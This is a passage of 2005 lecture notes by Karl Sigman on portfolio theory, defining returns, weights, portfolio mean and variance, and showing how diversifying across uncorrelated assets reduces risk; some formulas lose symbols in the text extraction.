- 6.0.x for 6.0.46 onwards | https://bz.apache.org/bugzilla/show_bug.cgi?id=60123 | CC-MAIN-2017-39 | refinedweb | 333 | 53.47 |
Hi,
I have a question regarding the warning that I get when I compile a program using boost::ublas library. I have to say that I'm not really experienced programmer so I might be doing something really stupid...
Anyway, I'm using WinXP with Mingw (gcc 3.4.5) and boost 1.34-1.
I want to create a simple function that returns a vector. I have it written like this:
===> Definition (file.h )
===> Implementation (file.cpp)===> Implementation (file.cpp)Code:
#include <boost/numeric/ublas/vector.hpp>
typedef boost::numeric::ublas::vector<double> vec;
vec testfunc (vec &v);
Code:
#include "file.h"
vec testfunc (vec &v)
{
vec v1 = v/2;
return v1;
}
When I try to compile, I get the following warning:
base class `class boost::numeric::ublas::storage_array<boost::numeri c::ublas::unbounded_array<double, std::allocator<double> > >' should be explicitly initialized in the copy constructor
What am I doing wrong and how can I fix this? The program works, but I'd like to get rid of the warning
Thank you very much for your answers. | http://cboard.cprogramming.com/cplusplus-programming/96013-base-class-should-explicitly-initialized-copy-constructor-printable-thread.html | CC-MAIN-2015-06 | refinedweb | 178 | 59.09 |
SUP!, well i need help, im using visual C++, and i need to write a simple program that reads 100 numbers from 1 to 100 on a txt file, calculates their average, and the standard deviation and then inputs the standard deviation and average into the original file at the bottom:? .....k i know you start off with the basic library's you'll be using and the basic setup and such,, but from there on i am completely lost8O ,........be great if someone could help me writing this out so i can understand what i should be doing..shouldn't take long since i was peeping the forum and people seem C++ savy here...
btw the file im using is called data.txt...and is in the "Temp" folder of my c drive...THIS is attempt so far ....keep in mind im mad beginner ...in essence i need help in the whole std deviation part.
THANKS!
btw this is my code so far, be great if someone could tell me if im ok so far, aslo how i could do the standard deviation, i cant find a way to do it..
Code:#include <iostream> #include <cmath> #include <fstream> #include <iomanip> using namespace std; int main() { float sum = 0, StdDev = 0; int x = 0; ifstream inFile; inFile.open("data.txt"); while ( inFile >> x ) { sum += x; } inFile.close(); ofstream outFile( "data.txt", ios::app ); outFile.seekp( ios::end ); outFile << sum << endl; outFile.close(); return 0; } | http://cboard.cprogramming.com/cplusplus-programming/94350-simple-program-help.html | CC-MAIN-2015-18 | refinedweb | 244 | 73.98 |
Multithreading : Lock objects - acquire() and release()
>()
In this chapter, we'll learn how to control access to shared resources. The control is necessary to prevent corruption of data. In other words, to guard against simultaneous access to an object, we need to use a Lock object..
Here is our example code using the Lock object. In the code the worker() function increments a Counter instance, which manages a Lock to prevent two threads from changing its internal state at the same time.
import threading import time import logging import random logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-9s) %(message)s',) class Counter(object): def __init__(self, start = 0): self.lock = threading.Lock() self.value = start def increment(self): logging.debug('Waiting for a lock') self.lock.acquire() try: logging.debug('Acquired a lock') self.value = self.value + 1 finally: logging.debug('Released a lock') self.lock.release() def worker(c): for i in range(2): r = random.random() logging.debug('Sleeping %0.02f', r) time.sleep(r) c.increment() logging.debug('Done') if __name__ == '__main__':)
Output:
(Thread-1 ) Sleeping 0.04 (MainThread) Waiting for worker threads (Thread-2 ) Sleeping 0.11 (Thread-1 ) Waiting for a lock (Thread-1 ) Acquired a lock (Thread-1 ) Released a lock (Thread-1 ) Sleeping 0.30 (Thread-2 ) Waiting for a lock (Thread-2 ) Acquired a lock (Thread-2 ) Released a lock (Thread-2 ) Sleeping 0.27 (Thread-1 ) Waiting for a lock (Thread-1 ) Acquired a lock (Thread-1 ) Released a lock (Thread-1 ) Done (Thread-2 ) Waiting for a lock (Thread-2 ) Acquired a lock (Thread-2 ) Released a lock (Thread-2 ) Done (MainThread) Counter: 4
In this example, worker() tries to acquire the lock three separate times, and counts how many attempts it has to make to do so. In the mean time, locker() cycles between holding and releasing the lock, with short sleep in each state used to simulate load.
import threading import time import logging logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-9s) %(message)s',) def locker(lock): logging.debug('Starting') while True: lock.acquire() try: logging.debug('Locking') time.sleep(1.0) finally: logging.debug('Not locking') lock.release() time.sleep(1.0) return def worker(lock): logging.debug('Starting') num_tries = 0 num_acquires = 0 while num_acquires < 3: time.sleep(0.5) logging.debug('Trying to acquire') acquired = lock.acquire(0) try: num_tries += 1 if acquired: logging.debug('Try #%d : Acquired', num_tries) num_acquires += 1 else: logging.debug('Try #%d : Not acquired', num_tries) finally: if acquired: lock.release() logging.debug('Done after %d tries', num_tries) if __name__ == '__main__': lock = threading.Lock() locker = threading.Thread(target=locker, args=(lock,), name='Locker') locker.setDaemon(True) locker.start() worker = threading.Thread(target=worker, args=(lock,), name='Worker') worker.start()
Output:
(Locker ) Starting (Locker ) Locking (Worker ) Starting (Worker ) Trying to acquire (Worker ) Try #1 : Not acquired (Locker ) Not locking (Worker ) Trying to acquire (Worker ) Try #2 : Acquired (Worker ) Trying to acquire (Worker ) Try #3 : Acquired (Locker ) Locking (Worker ) Trying to acquire (Worker ) Try #4 : Not acquired (Worker ) Trying to acquire (Worker ) Try #5 : Not acquired (Locker ) Not locking (Worker ) Trying to acquire (Worker ) Try #6 : Acquired (Worker ) Done after 6 tries ... | http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Lock_Objects_Acquire_Release.php | CC-MAIN-2017-34 | refinedweb | 527 | 52.26 |
Visit my website at:
Recently I was testing a BizTalk map inside Visual Studios. The input schema was auto generated using the SQL Adapter and the output was a simple text file. I was using a sample file provided to me from a past generation from the schema (or so I thought) to test the map.
When I was testing, I keep getting a blank file as output and a strange error. The error was: Native serialization error: Root element is missing.
I had both input and output validation turned on and the input sample file was passing validation. To confirm this, I took the schema and sample file and confirmed it validated using Visual Studios.
Since I was not having much luck testing inside Visual Studios, I decided to set up a send & receive port and test the map through BizTalk to see if I could get different result. This time, I got a subscription not found error.
Odd, since the schema and maps are all deployed. I check the message that was suspended and noticed it was not mapped; my original message was published and suspended.
This could only mean the message type was wrong - somehow. So I took a closer look at the namespace in the sample message. It was slightly off! I corrected the namespace in the sample file and everything worked fine.
Overall, the moral of the story is three fold:
1. Schema Validation inside BizTalk DOES NOT validate namespace; at least it doesn’t if there is only one.
2. When you get a strange mapping error with no output, check your namespace!
3. Use extreme caution when typing in the namespace fields when using the SQL Adapter. Evidently in a past test the namespace was typed incorrectly. When the SQL Schema was auto generated, this wrong schema was use to make the sample file I was using.
This took me over an hour to figure out so I guess I’m getting rusty at testing BizTalk maps. Hope this helps someone else out down the road. | http://geekswithblogs.net/sthomas/archive/2006/08/15/88094.aspx | CC-MAIN-2017-39 | refinedweb | 343 | 73.37 |
I experimented with Dapper and Dapper.Contrib. I have the following class:
public class Customer { public int Id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public DateTime DateOfBirth { get; set; } public bool Active { get; set; } }
It is beeing mapped to the table "
Customers" which is pluralized. Is there a simple way to make Dapper use singular table names for all tables?
Dapper.Contrib supports the
Table attribute. Use it to manually specify the name of the table that an entity uses. See the docs for further information.
Alternatively there is a static delegate on
SqlMapperExtensions called
TableNameMapper. You can replace this with an implementation that performs the pluralization. PluralizationService in the framework can help you here.
It is used as follows:
SqlMapperExtensions.TableNameMapper = (type) => { // do something here to pluralize the name of the type return type.Name; }; | https://dapper-tutorial.net/knowledge-base/32204808/dapper-use-singular-table-name | CC-MAIN-2021-25 | refinedweb | 142 | 50.33 |
Question
What is the difference between
import Swift and
import Foundation?
Until I read this comment by Martin R, I didn’t even know that there was an
import Swift.
Reading
I couldn’t find the documentation and doing a Google search didn’t turn up much.
What I tried
Testing it out shows that
import Swift does not give any compile errors, but that doesn’t really answer my question.
If I were to guess, I would say that you import Swift for Swift projects and that you import Foundation for Objective-C projects or maybe for Swift projects that use Objective-C classes (like
NSString).
Testing this in the Playground:
import Foundation
import Swift
var str = "Hello, playground"
let str2: NSString = "hello"
let str3: String = "hello"
Commenting out
import Swift gives no errors and
str is of
String type. However, commenting out
import Foundation gives an “undeclared type” error for
NSString.
My question revisited
I would be happy enough to abandon Foundation and just use Swift. So am I right to just import Swift all the time unless I specifically need to use one of the old Objective-C classes?
Yes, you will only need
import Foundation if you want to access NSObject or one of its subclasses. Foundation is the framework that brings in that class hierarchy. However, it’s highly likely that in a project you’ll need more than just
import Swift. Like Rob commented,
import UIKit is also a nice option.
In case you haven’t read it already, Apple explains the Foundation framework here. | https://coded3.com/import-swift-vs-import-foundation/ | CC-MAIN-2022-40 | refinedweb | 261 | 70.23 |
.
Working with Flags
Let me start do demonstrate how you should work with flags in you code. First, flags shall be easily combined using the or
| operator:
Chip::setMode(Mode::Enabled|Mode::Speed100kHz|Mode::Alternative);
In your implementation, you should be able to test for flags and convert combined flags into a bit mask.
void setMode(Modes modes) { if (modes.isSet(Mode::Enabled)) { // ... } MODE_REG = modes; }
The last requirement is to make everything type safe. This means, a flag e.g. from the enumeration
A can not be used for the flags in
B. This will prevent many typos and errors in your code.
Chip::setMode(Pin::Enabled); // ERROR!
Implementation
The implementation of this behaviour is very simple. First we need a simple template class to create a new type for the flags:
Used Language Features
This code is using many language features from C++11. Therefore you have to make sure the compiler in your build chain supports this language version. This is already the case for the Arduino IDE any many other GCC based environments. Sometimes you have to add the
-std=C++11 or even better
-std=C++17 command line option to enable the latest language features.
Basic Required Features
- The
header: This header from the standard library defines the types
uint8_tor
int32_tto declare variables of a defined size. The header should exist in every C++ environment. If your development environment does not support this header, you should switch to another one.
- Template class: Template classes working like regular classes, but certain parameters are defined at the point of use. Usually this parameters define types which are used for the class. The compiler will automatically generate a new class definition using this parameter at the point a template class is first used in the code. Template classes are an important feature of the C++ language and should be present in every development environment.
- The
inlinespecifier: This specifier is a simple hint to the compiler to use the code of a function directly, replacing the call. This is just a hint.
- Namespaces: Especially for embedded code, namespaces are a really great tool to keep your own types and variables in a own scope. They are also a nice tool to create logical modules without using singleton classes.
Features from C++11
- Type Traits: The
header defines a number of template classes which can be used in combination with
static_assert, to check the type of parameters. It can also be used in template to conclude a type from a parameter.
- The
noexceptspecifier: It declares a function will never throw an exception. Exception are usually not used in embedded code, but this class can be universally used in desktop and embedded code. Marking functions not throwing exceptions will allow the compiler to generate better optimisations.
- The
constexprspecifier: It declares a function with a given input will always generate the same output. This will allow the compiler to evaluate a function at compile time. Marking the right methods with the specifier will not only reduce the size of the generated binary, it will also allow to use flag combinations as constants.
- The initialiser list feature: Using the
header allows creating a constructor using an initialiser list. This will allow to initialize flags with syntax like this:
const Flags flags = {Flag::A, Flag::B, Flag::C};
Simple Usage Example
See the following code of a driver for the TCA9548A chip as a very simple example. I removed all comments and some methods to demonstrate the usage.
This simple I2C multiplexer chip allows enabling any combination of the eight supported channels. Using the flags class, the usage of this interface is simple and safe. You easily enable one or more channels.
Working with the flags in the implementation is very simple.
As you can see, you can work with the channels very similar as you would with any other bit mask. The difference is the type safety. It is not possible to accidentally mix bits from one flags type with another.
In line 38, you can also see how the flags type is implicitly converted into a bit mask. This is a one way operation. The flags can be converted into a bit mask, but an “anonymous” bit mask can not be converted automatically into a flags type.
Advanced Usage
You can not only use simple flags, where each bit is assigned to one enumeration value. Any combination of bits and masks is possible.
Conclusion
The flags template class will allow you to work with flags in a safe and comfortable way. The compiler will detect any potential problems where you use the wrong enumeration type for the flags.
If you have questions, miss some information or just have any feedback, feel free to add a comment below.
Have fun! | https://luckyresistor.me/2018/05/06/make-your-code-safe-and-readable-with-flags/?shared=email&msg=fail | CC-MAIN-2019-30 | refinedweb | 797 | 55.44 |
I also faced the same problem, but don’t remember the exact reason for this. Look for it on keras github issues.
Try this:
for layer in fc_model.layers: layer.called_with = None conv_model.add(layer)
I also faced the same problem, but don’t remember the exact reason for this. Look for it on keras github issues.
Try this:
for layer in fc_model.layers: layer.called_with = None conv_model.add(layer)
Thank you @Manoj , it worked ! Although I don’t know why it raised this error , but it works, thanks again.
Hi, Jeremy,
In the lesson 3 notes, as to “filters”, there is a sentence “Then we would imagine that the brightest pixels in this new image are ones in a 3x3 area where the row above it s all 0 (black), and the center row is all 1 (white)”. How to understand it? I can’t catch what it means.
Thanks
Liu Peng
Hello everyone!
I’m having memory issues on lesson 3. The execution of the code runs fine until here:
conv_model.fit_generator(batches, samples_per_epoch=batches.nb_sample, nb_epoch=8,
validation_data=val_batches, nb_val_samples=val_batches.nb_sample)
After doing some stuff, I executed that line, getting a memory error after a couple of seconds. I tried re-executing all the code from scratch after a fresh reboot, and the program started fitting, but on the fourth epoch or so, I got the memory error again, which is the following:
MemoryError Traceback (most recent call last)
in ()
1 conv_model.fit_generator(batches, samples_per_epoch=batches.nb_sample, nb_epoch=8,
----> 2 validation_data=val_batches, nb_val_samples=val_batches.nb_sample)
/home/user/anaconda2/lib/python2.7/site-packages/keras/models.pyc in fit_generator(self, generator, samples_per_epoch, nb_epoch, verbose, callbacks, validation_data, nb_val_samples, class_weight, max_q_size, nb_worker, pickle_safe, initial_epoch, **kwargs)
933 nb_worker=nb_worker,
934 pickle_safe=pickle_safe,
–> 935 initial_epoch=initial_epoch)
936
937 def evaluate_generator(self, generator, val_samples,
/home/user/anaconda2/lib/python2.7/site-packages/keras/engine/training.pyc in fit_generator(self, generator, samples_per_epoch, nb_epoch, verbose, callbacks, validation_data, nb_val_samples, class_weight, max_q_size, nb_worker, pickle_safe, initial_epoch)
1555 outs = self.train_on_batch(x, y,
1556 sample_weight=sample_weight,
-> 1557 class_weight=class_weight)
1558
1559 if not isinstance(outs, list):
/home/user/anaconda2/lib/python2.7/site-packages/keras/engine/training.pyc in train_on_batch(self, x, y, sample_weight, class_weight)
1318 ins = x + y + sample_weights
1319 self._make_train_function()
-> 1320 outputs = self.train_function(ins)
1321 if len(outputs) == 1:
1322 return outputs[0]
/home/user/anaconda2/lib/python2.7/site-packages/keras/backend/theano_backend.pyc in call(self, inputs)
957 def call(self, inputs):
958 assert isinstance(inputs, (list, tuple))
–> 959 return self.function(*inputs)
960
961
/home/user/anaconda2/lib/python2.7/site-packages/theano/compile/function_module.pyc in call(self, *args, **kwargs)
896 node=self.fn.nodes[self.fn.position_of_error],
897 thunk=thunk,
–> 898 storage_map=getattr(self.fn, ‘storage_map’, None))
899 else:
900 # old-style linkers raise their own exceptions
/home/user/anaconda2/lib/python2.7/site-packages/theano/gof/link.pyc in raise_with_op(node, thunk, exc_info, storage_map)
323 # extra long error message in that case.
324 pass
–> 325 reraise(exc_type, exc_value, exc_trace)
326
327
/home/user/anaconda2/lib/python2.7/site-packages/theano/compile/function_module.pyc in call(self, *args, **kwargs)
882 try:
883 outputs =
–> 884 self.fn() if output_subset is None else
885 self.fn(output_subset=output_subset)
886 except Exception:
MemoryError: Error allocating 411041792 bytes of device memory (out of memory).
Apply node that caused the error: GpuAllocEmpty(Assert{msg=‘The convolution would produce an invalid shape (dim[0] < 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[1] < 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[2] <= 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[3] <= 0).’}.0)
Toposort index: 211
Inputs types: [TensorType(int64, scalar), TensorType(int64, scalar), TensorType(int64, scalar), TensorType(int64, scalar)]
Inputs shapes: [(), (), (), ()]
Inputs strides: [(), (), (), ()]
Inputs values: [array(32), array(64), array(224), array(224)]
Outputs clients: [[GpuDnnConv{algo=‘small’, inplace=True}(GpuContiguous.0, GpuContiguous.0, GpuAllocEmpty.0, GpuDnnConvDesc{border_mode=‘valid’, subsample=(1, 1), conv_mode=‘conv’, precision=‘float32’}.0, Constant{1.0}, Constant{0.0})]]
HINT: Re-running with most Theano optimization disabled could give you a back-trace of when this node was created. This can be done with by setting the Theano flag ‘optimizer=fast_compile’. If that does not work, Theano optimizations can be disabled with ‘optimizer=None’.
HINT: Use the Theano flag ‘exception_verbosity=high’ for a debugprint and storage map footprint of this apply node.
I’m not sure where or why the error is produced… I’m running the course on my local machine, with 16 GB RAM and a GTX 970 running on Ubuntu.
Can someone help me? Thanks in advance.
Hi justinho,
That was bugging me as well. It turns out that updating the weights for bn_layers on line 80 updates the weights in the final model on line 79. I checked before and after just to be sure!
I could not find a compare weights function in Keras, so I use the code below to compare weights between 2 equally structured sequential models:
def compare_weights(model_1, model_2): for i in range(len(model_1.layers)): same = True for j in range(len(model_1.layers[i].get_weights())): if not (np.array_equal(model_1.layers[i].get_weights()[j], model_2.layers[i].get_weights()[j])): same = False print(same)
I had a question about the running notebooks. It has been my understanding that the * appears next to code while it is executing. However, during fitting sections of code it appears to have already executed (fc_model = get_fc_model) and still has the *. I believe the code is done executing because the fitting output from the code below (fc_model.fit) is showing. Usually after the fitting is complete the * corrects is replaced by a number.
Does anyone know why this is happening?
For example see this screenshot below.
My concern is more about debuggging. I have noticed the notebook hang when I execute several sections at the same time and Im not sure which section of the notebook needs attention.
I understand that overfitting first allows us to know the model is complex enough to handle the data.
My question is how to determine when we are overfitting. Just noting that val_acc is worse than training acc would seem to be not enough, in the case where Dropouts (applied to training but not validation) may artificially hamper training accuracy.
Should I train until val_acc begins to decrease instead, and not worry so much about comparing it directly to the training accuracy?
If validation is worse than training, then you’re overfitting - since dropout makes training worse, not better! However, you don’t want to have no overfitting - there’s some best amount. So you should focus on getting the best validation score you can, rather than the least overfitting.
In the notes about Zero-Padding, the first sentence reads:
… given that the filter necessarily operates on the premise that there are 8 surrounding pixels.
Why is the filter operating on the premise that there are 8 surrounding pixels? I thought it should be 9 surrounding pixels since the filter is a 3 x 3 matrix.
I’m confused about the role of vgg_ft(out_dim). My understanding is this updated model cuts off the last layer(s) and replaces it with a softmax layer with a specified number of outputs (2 in our case, dogs and cats). But Keras did this automatically for us using the Vgg16() model and our original 7 lines of code, right? Why do we have to hardcode this change now?
In the original 7 lines of code, this was achieved by the following line:
vgg.finetune(batches)
finetune calls vgg_ft(batches.nb_class), which basically achieves the same thing.
@atk0 - Thanks for your reply. It looks to me as though vgg.finetune(batches) calls up vgg.ft(num), and vgg_ft(out_dim) is an unrelated alternative function that exists in utils.py. Do I have this right? And if so, why was vgg_ft(out_dim) built in the first place?
Hi again, Jake
They’re not unrelated - the “global” vgg_ft(out_dim) function is simply a convenience function that creates a vgg16 model, performs finetuning on that model and then returns the model. Because part1 uses vgg16 frequently, Jeremy obviously decided that it would be nice to have a convenience function that does everything under the hood.
In the Lesson3,ipynb, I saw the In[6] is like this:
# Copy the weights from the pre-trained model. # NB: Since we're removing dropout, we want to half the weights def proc_wgts(layer): return [o/2 for o in layer.get_weights()]
This mean using the 1/2 of each value of weights, right? But dropout is related to reduce the number of weights, so I am confused why we divide each weight by 2 here. Can anyone help me understand it?
In addition, if the Dropout is not 0.5, but say, 0.8, do we still divide by 2?
How do I check the ‘summary’ of
conv_layers and
fc_layers after
conv_layers = layers[:last_conv_idx+1] fc_layers = layers[last_conv_idx+1:]
They are lists, but I can only get something like this if I display the
fc_layers:
[<keras.layers.pooling.MaxPooling2D at 0x7ff151153610>, <keras.layers.core.Flatten at 0x7ff1510b64d0>, <keras.layers.core.Dense at 0x7ff1511255d0>, <keras.layers.core.Dropout at 0x7ff15111f850>, <keras.layers.core.Dense at 0x7ff1510bf250>, <keras.layers.core.Dropout at 0x7ff1510d9250>, <keras.layers.core.Dense at 0x7ff1510ae290>]
How can I check the shape of each of these layers?? Thanks!
I have this question because when I do:
def get_fc_model(): model = Sequential([ MaxPooling2D(input_shape=conv_layers[-1].output_shape[1:]), Flatten(), Dense(4096, activation='relu'), Dropout(0.), Dense(4096, activation='relu'), Dropout(0.), Dense(3, activation='softmax') ]) for l1, l2 in zip(model.layers, fc_layers): l1.set_weights(proc_wgts(l2)) model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy']) return model fc_mdl = get_fc_model()
I got errors like:
ValueError Traceback (most recent call last)
in ()
----> 1 fc_mdl = get_fc_model()
in get_fc_model()
10 ])
11
—> 12 for l1, l2 in zip(model.layers, fc_layers): l1.set_weights(proc_wgts(l2))
13
14 model.compile(optimizer=opt,
/home/shi/anaconda2/lib/python2.7/site-packages/keras/engine/topology.pyc in set_weights(self, weights)
983 str(pv.shape) +
984 ’ not compatible with '
–> 985 'provided weight shape ’ + str(w.shape))
986 weight_value_tuples.append((p, w))
987 K.batch_set_value(weight_value_tuples)
ValueError: Layer weight shape (4096, 3) not compatible with provided weight shape (4096, 1000)
So I think the shape is wrong somewhere. Please help!
Hi, I have a question about training low level filters (that is, the first or second conv level). When we train the last level, we easily come up with loss function using log loss or simple sse. It’s based on the correct label and our predicted probability.
But for the first few levels, they are meant to capture abstract structures like edges and curves. Not only there’s no way to tell if the current activation map is correct (look at it manually??), but also it’s hard to get numerical loss (how wrong/right we are).
So, how do we train the set of weights (in this case, the values in the filter matrix) for the low level filters in practice?
Read some of the articles on back propagation. That’s how earlier layers get trained.
Hi,
First off apologies if this has been asked before. A search of the forums for State Farm didn’t turn up any related results. I am encountering issues with the State Farm data set. I am able to download the data set using the Kaggle cli tool after accepting the competitions terms. Checking the file sizes of the downloaded zip files confirms that I have correctly downloaded the data i.e. the imgs.zip file is 4.0GB on disk. I am unable to unzip the files. It appears that the zip files are corrupted in some way, or that they are not actually zip files.
unzip imgs.zip
results in the following output
Archive: imgs imgs.zip or imgs.zip.zip, and cannot find imgs.zip.ZIP, period.
I also tried using the
jar tool which was suggested on stackoverflow.
jar xf imgs.zip
Results in
Ick! 0
Myself and some others started the fast.ai course together recently. Others have encountered the same issue so it is definitely not isolated to my case. Has any one else encountered this issue and know of a solution or an alternate place to obtain the competition data set? Does this suggest that the competition has closed or something? I’m new to Kaggle.
Thanks,
Chris | http://forums.fast.ai/t/lesson-3-discussion/186?page=7 | CC-MAIN-2018-17 | refinedweb | 2,085 | 51.14 |
Problem:
You have C code like
printf("test");
but when you try to compile it you see a warning like
main.c: In function ‘main’: main.c:2:5: warning: implicit declaration of function ‘printf’ [-Wimplicit-function-declaration] printf("test"); ^~~~~~ main.c:2:5: warning: incompatible implicit declaration of built-in function ‘printf’ main.c:2:5: note: include ‘<stdio.h>’ or provide a declaration of ‘printf’
Solution:
Add
#include <stdio.h>
at the top of the source file where the warning occured.
Note that this warning message is just a warning and if you use printf correctly, your program will work even without
#include <stdio.h>. However, incorrect usage of
printf and similar functions will lead to hard-to-debug errors, so I recommend to add
#include <stdio.h> in any case, even if it works without. | https://techoverflow.net/2019/06/20/how-to-fix-gcc-error-implicit-declaration-of-function-printf/ | CC-MAIN-2019-30 | refinedweb | 138 | 59.6 |
HI,
In class1 video path of URLs.PETS is comming as ‘’
Where in code this path was put in URLs.PETs
Thanks
HI,
In class1 video path of URLs.PETS is comming as ‘’
Where in code this path was put in URLs.PETs
Thanks
I think this is a function built into the FastAI library. When you call this function, the FastAI API downloads a copy of the data you specify, in this case PETS, from an S3 bucket on AmazonS3. So I don’t think you have to explicitly write out the AWS location of the data, the fastAI library downloads the data from where it is stored for you when you tell it which dataset to download,
URLs is a global constant built in to FastAI. You can check out the documentation for URLs and the source code.
So I guess we imported those global constants when we ran:
from fastai.vision import *
As a side note, there are a few ways to find out more information about something in the code:
doc(URLs)
help(URLs)
I just completed lesson 1 and am trying to do this exercise with another dataset. Before getting my own from google images, I was thinking of using something readily available (like the Iris set for UCI.)
I am unsure of how to substitute the PETs example with this new data set. Can anyone help me out?
I am in the same boat. I have been through the first video a few times and I have been through the first notebook more than that. The first time just running the modules and than trying some different things. Mostly the number if iterations and watching with a few more the results improve, and with a lot more watching them overshoot, and start to move back to the best up until then. The terms used are not super well explained, and being out for the first time this is all new. After a few trips through, I tried uploading a different dataset and things got interesting. I have been unable to get untar to swallow anything I have tried. Oddly enough when I try sticking URLs.PETS into my browser it barfs, but if I add a tar extension it will try and download a .tgz file. IMHO this function and way of grabbing data seems to make it very hard for us to play with this notebook.
The other thing is that you get to the end of the notebook, and you see your numbers improve, but you have no real way to actually play with it. How about a piece at the end for you to upload your own image(s) and see how it does at classifying it/them. To me that is the part that I really want to see work.
I am thankful for this, you guys put a ton of work into it, but I think you are working at such a high level you may have forgot what it is like just getting started. | https://forums.fast.ai/t/class1-video-path-of-urls-pets/58487 | CC-MAIN-2019-51 | refinedweb | 506 | 78.28 |
For a list of functions, their usage, and more, check out
What is PowerZure?
PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.
CLI vs. Portal
A common question is why use PowerZure or command line at all when you can just login to the Azure web portal?
This is a fair question and to be honest, you can accomplish 90% of the functionality in PowerZure through clicking around in the portal, however by using the Azure PowerShell modules, you can perform tasks programmatically that are tedious in the portal. E.g, listing the groups a user belongs to. In addition, the ability to programmatically upload exploits instead of tinkering around with the messy web UI. Finally, if you compromise a user who has used the PowerShell module for Azure before and are able to steal the accesstoken.json file, you can impersonate that user which effectively bypasses multi-factor authentication.
Why PowerShell?
While the offensive security industry has seen a decline in PowerShell usage due to the advancements of defensive products and solutions, this project does not contain any malicious code. PowerZure does not exploit bugs within Azure, it exploits misconfigurations.
C# was also explored for creating this project but there were two main problems:
There were at least four different APIs being used for the project. MSOL, Azure REST, Azure SDK, Graph.
The documentation for these APIs simply was too poor to continue. Entire methods missing, namespaces typo’d, and other problems begged the question of what advantage did C# give over PowerShell (Answer: none)
Realistically, there is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure CLI.
Requirements
The "Az" Azure PowerShell module is the primary module used in PowerZure, as it handles most requests interacting with Azure resources. The Az module interacts using the Azure REST API.
The AzureAD PowerShell Module is also used and is for handling AzureAD requests. The AzureAD module uses the Microsoft Graph API.
Author
Author: Ryan Hausknecht (@haus3c) | https://amp.kitploit.com/2020/11/powerzure-powershell-framework-to.html | CC-MAIN-2022-27 | refinedweb | 381 | 54.22 |
1 Portfolio mean and variance
- Clement Griffin
- 2 years ago
- Views:
Transcription
1 Copyright c 2005 by Karl Sigman Portfolio mean and variance Here we study the performance of a one-period investment X 0 > 0 (dollars) shared among several different assets. Our criterion for measuring performance will be the mean and variance of its rate of return; the variance being viewed as measuring the risk involved. Among other things we will see that the variance of an investment can be reduced simply by diversifying, that is, by sharing the X 0 among more than one asset, and this is so even if the assets are uncorrelated. At one extreme, we shall find that it is even possible, under strong enough correlation between assets, to reduce the variance to 0, thus obtaining a risk-free investment from risky assets. We will also study the Markowitz optimization problem and its solution, a problem of minimizing the variance of a portfolio for a given fixed desired expected rate of return.. Basic model You plan to invest a (deterministic) total of X 0 > 0 at time t = 0 in a portfolio of n 2 distinct assets, and the payoff X comes one period of time later (at time t = for simplicity). Apriori you do not know how to distribute the amount X 0 among the n assets, your objective being to distribute X 0 in such a way as to give you the best performance. If X 0i is the amount to be invested in asset i, i {, 2,..., n}, then X 0 = X 0 + X X 0n. The portfolio chosen is described by the vector (X 0, X 02,..., X 0n ) and its payoff is given by X = X +X 2 + +X n, where X i is the (random) payoff from investing X 0i in asset i, that is, the cash flow you receive at time t =. R i, called the total return, is the payoff per dollar invested in asset i, R i = X i X 0i. We define the rate of return as the corresponding rate and it holds then that r i def = R i = X i X 0i X 0i ; X i = ( + r i )X 0i. But note that unlike fixed-income securities, here the rate r i is a random variable since X 0i is assumed so. The expected rate of return (also called the mean or average rate of return) is given by r i = E(r i ), and since X 0i is assumed deterministic (non-random) it also holds that E(X i ) = ( + r i )X 0i. Shorting is allowed, so some of the X 0i can be negative (as well as positive or zero), as long as X 0 + X X 0n = X 0 > 0. It is convenient to define weights (also called proportions), α i = X 0i X 0 = proportion of resources invested in asset i, The point here is that the assets are bought/sold in shares and any proportion thereof. So if one dollar buys 0.4 shares of an asset, and yields payoff 6 dollars, then 0 dollars buys 4 shares and yields payoff 60 dollars.
2 and it follows that α i =, and the portfolio can equivalently be described by (α, α 2,..., α n ) with rate of return, and expected rate of return given by r = r = E(r) = α i r i () α i r i. (2) Letting σ 2 i = V ar(r i) = E(r 2 i ) r2 i, and σ ij = Cov(r i, r j ) = E(r i r j ) r i r j, the variance of rate of return of the portfolio is given by σ 2 = V ar(r) = αi 2 σ 2 i + 2 α i α j σ ij. (3) i<j n σ 2 is a measure of the risk involved for this portfolio; it is a measure of how far from the mean r our true rate of return r could be. After all, r is an average, and the rate of return r is a random variable that may (with positive probability) take on values considerably smaller than r. Note that the value of X 0 is not needed in determining performance, only the proportions (α, α 2,..., α n ) are needed: Wether you invest a total of one dollar, or a million dollars, the values of r, r and σ 2 are the same when the proportions are the same. In effect, any portfolio can simply be described by a vector (α, α 2,..., α n ), where n α i =. Clearly we could obtain σ 2 = min{σ 2, σ2 2,..., σ2 n} by investing all of X 0 in the asset with the smallest variance; thus it is of interest to explore how, by investing in more than one asset, we can reduce the variance even further. We do so in the next sections..2 Reducing risk by diversification One of the main advantages of investing in more than one asset is the possible reduction of risk. Intuitively, by sharing your resources among several different assets, even if one of them has a disasterous (very low) payoff due to its variability, chances are the others will not. To illustrate this phenomina, let us consider n uncorrelated assets (e.g., Cov(r i, r j ) = 0 for i j) each having the same expected value and variance for rate of return; r i = 0.20, σi 2 =. If you invest all your resources in just one of them, then the performance of your investment is (r, σ 2 ) = (0.20, ). Now suppose instead that you invest in all n assets in equal proportions, α i = /n. Then from () and (3) and the fact that σ ij = 0, i j, by the uncorrelated assumption, we conclude that the mean rate of return remains at r = 0.20, 0.20 = 0.20 n, but the variance for the portfolio drops to σ 2 = /n, n n = n 2 = n n 2. 2
